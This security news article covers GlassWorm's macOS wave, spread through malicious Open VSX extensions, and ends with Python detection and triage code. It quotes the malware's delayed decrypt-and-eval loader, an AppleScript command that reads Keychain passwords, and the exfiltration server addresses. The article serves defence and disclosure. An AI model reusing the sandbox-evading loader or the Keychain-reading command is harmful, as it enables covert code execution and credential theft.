
GlassWorm Attacks macOS via Malicious VS Code…

By Jennifer Sherman, January 1, 2026


A new wave of GlassWorm malware marks a significant shift: instead of targeting only Windows systems, it now targets macOS. GlassWorm is a self-propagating worm that spreads through malicious VS Code extensions published on the Open VSX marketplace, and those extensions have already accumulated more than 50,000 downloads.

The fourth wave introduces several concerning changes, including encrypted payloads, hardware wallet trojanization, and sandbox evasion techniques that let it slip past traditional security scanning tools.

The threat actor behind GlassWorm has proven remarkably adaptive, evolving through four distinct waves since October. Previous campaigns relied on invisible Unicode characters and compiled Rust binaries to conceal malicious code.

The latest iteration abandons these approaches in favor of AES-256-CBC encrypted JavaScript payloads specifically engineered for macOS environments.

Prettier Pro on open-vsx (Source - Koi)

Three suspicious extensions were flagged on the Open VSX marketplace: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all connected through shared infrastructure and encryption keys.

The malware employs a Solana blockchain-based command and control infrastructure that makes takedown efforts nearly impossible.

By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker maintains decentralized control that cannot be disrupted through traditional domain blocking.

Researchers traced the infrastructure to IP address 45.32.151.157, which was also used in the third wave, confirming continuity of the threat actor.

Koi analysts identified the malware through behavioral analysis after their risk engine detected unusual patterns in extension behavior and network communications.

Encrypted Payload and Sandbox Evasion Tactics

The fourth wave introduces a clever timing mechanism designed to evade automated security analysis. Once installed, the malicious extension waits exactly 15 minutes before executing its payload.

This delay is critical because most sandbox environments time out after 5 minutes, so the malware appears completely benign during automated scanning.

The code contains a hardcoded delay of 9e5 milliseconds (900,000 ms, i.e. 15 minutes), after which it decrypts and executes the AES-256-CBC encrypted payload.

// Node.js crypto module; key, iv and encryptedData are the hardcoded values embedded in the extension
const crypto = require('crypto');
setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);   // AES-256-CBC with the hardcoded key and IV
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');     // base64 ciphertext -> JavaScript source
  payload += decrypted.final('utf8');
  eval(payload);                                                       // run the decrypted second stage
}, 9e5);                                                               // 9e5 ms = 15 minutes, past the usual 5-minute sandbox budget
Encrypted payload execution (Source - Koi)

The payload itself is embedded at line 64 of the main extension file, encrypted with a hardcoded key and initialization vector that remains consistent across all three malicious extensions.

This shared cryptographic infrastructure confirms a single threat actor is responsible for the campaign.
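A static check for the delayed-decrypt-then-eval pattern described above, written here as an added example (not Koi's tooling or the extension's own code): it flags a setTimeout delay longer than the 5-minute sandbox budget when it appears alongside an AES-256-CBC decipher and an eval sink. The threshold, regexes and sample sources are constructed assumptions.

```python
import re

# Sandbox budget the article cites (5 minutes). Constructed threshold: any timer
# longer than this is worth a look, since an automated scan never sees it fire.
SANDBOX_TIMEOUT_MS = 5 * 60 * 1000

# Heuristic regexes: the trailing numeric argument of a setTimeout call, an
# AES-256-CBC decipher, and a dynamic-code sink. Regex, not a JS parser.
SETTIMEOUT_RE = re.compile(r"setTimeout\s*\(.*?,\s*([0-9][0-9_.eE+-]*)\s*\)", re.S)
DECRYPT_RE = re.compile(r"createDecipheriv\s*\(\s*['\"]aes-256-cbc['\"]")
EVAL_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(")

def parse_ms(literal):
    """Convert a JS numeric literal such as '9e5' or '900_000' to integer milliseconds."""
    return int(float(literal.replace("_", "")))

def scan_extension_source(src):
    """Score one extension's JavaScript for the delayed-decrypt-then-eval pattern."""
    delays = [parse_ms(m.group(1)) for m in SETTIMEOUT_RE.finditer(src)]
    long_delays = [d for d in delays if d > SANDBOX_TIMEOUT_MS]
    findings = {
        "long_delay_ms": long_delays,
        "aes_cbc_decrypt": bool(DECRYPT_RE.search(src)),
        "dynamic_eval": bool(EVAL_RE.search(src)),
    }
    # All three together is the fourth-wave shape; any one alone is common in benign code.
    findings["suspicious"] = bool(long_delays) and findings["aes_cbc_decrypt"] and findings["dynamic_eval"]
    return findings

# Constructed samples: one mirrors the snippet Koi published, one is an ordinary UI timer.
MALICIOUS_SAMPLE = """
setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);
"""
BENIGN_SAMPLE = "setTimeout(() => { statusBar.text = 'ready'; }, 1500);"

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_extension_source(src))
```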

After the delay period expires, the malware retrieves the current command-and-control endpoint from the Solana blockchain and executes any instructions it receives.

The macOS-specific payload includes AppleScript for stealth execution, LaunchAgents for persistence rather than Windows Registry keys, and direct access to the macOS Keychain database to retrieve stored passwords and credentials.

set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"

The malware also includes the capability to replace hardware wallet applications with trojanized versions, targeting both Ledger Live and Trezor Suite.

While the wallet replacement functionality was not fully active during testing on December 29, 2025, the code infrastructure is complete and awaiting payload uploads.

The malware validates that downloaded files exceed 1000 bytes before installation, preventing broken installations that might alert victims.

All stolen data gets staged in the temporary directory /tmp/ijewf/, compressed, and sent to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.
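A host triage routine for the macOS indicators this article lists, added here as an example and not Koi's code: it checks installed extension names against the three flagged extensions, LaunchAgents that launch osascript or anything under /tmp, the /tmp/ijewf staging directory, and the two IP addresses named above. The osascript/tmp heuristic, the sample plist and the live-host collector are constructed assumptions.

```python
import plistlib
from pathlib import Path

# Indicators quoted in the article; the heuristics and sample data below are constructed.
GLASSWORM_EXTENSIONS = ("pro-svelte-extension", "vsce-prettier-pro",
                        "full-access-catppuccin-pro-extension")
STAGING_DIR = "/tmp/ijewf"
GLASSWORM_IPS = {"45.32.151.157", "45.32.150.251"}

def suspicious_launch_agent(plist_bytes):
    """Flag a LaunchAgent whose program line runs osascript or anything under /tmp."""
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception:
        return False
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    line = " ".join(str(a) for a in args)
    return "osascript" in line or "/tmp/" in line

def triage(extension_names, launch_agents, existing_paths, remote_ips):
    """Return (indicator, evidence) pairs; inputs are plain data so this runs offline."""
    hits = [("extension", n) for n in extension_names
            if any(ioc in n for ioc in GLASSWORM_EXTENSIONS)]
    hits += [("launch_agent", p) for p, data in launch_agents.items()
             if suspicious_launch_agent(data)]
    if any(str(p).startswith(STAGING_DIR) for p in existing_paths):
        hits.append(("staging_dir", STAGING_DIR))
    hits += [("network", ip) for ip in remote_ips if ip in GLASSWORM_IPS]
    return hits

def triage_live_host(home=None, remote_ips=()):
    """Collect the same inputs for this macOS user; pass remote IPs gathered from lsof/netstat."""
    home = Path(home) if home else Path.home()
    ext_dir, agents_dir = home / ".vscode" / "extensions", home / "Library" / "LaunchAgents"
    names = [p.name for p in ext_dir.iterdir()] if ext_dir.is_dir() else []
    agents = {str(p): p.read_bytes() for p in agents_dir.glob("*.plist")} if agents_dir.is_dir() else {}
    existing = [STAGING_DIR] if Path(STAGING_DIR).exists() else []
    return triage(names, agents, existing, remote_ips)

# Constructed LaunchAgent in the shape the article describes: osascript run from the staging dir.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/usr/bin/osascript</string><string>/tmp/ijewf/run.scpt</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    print(triage_live_host())
```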
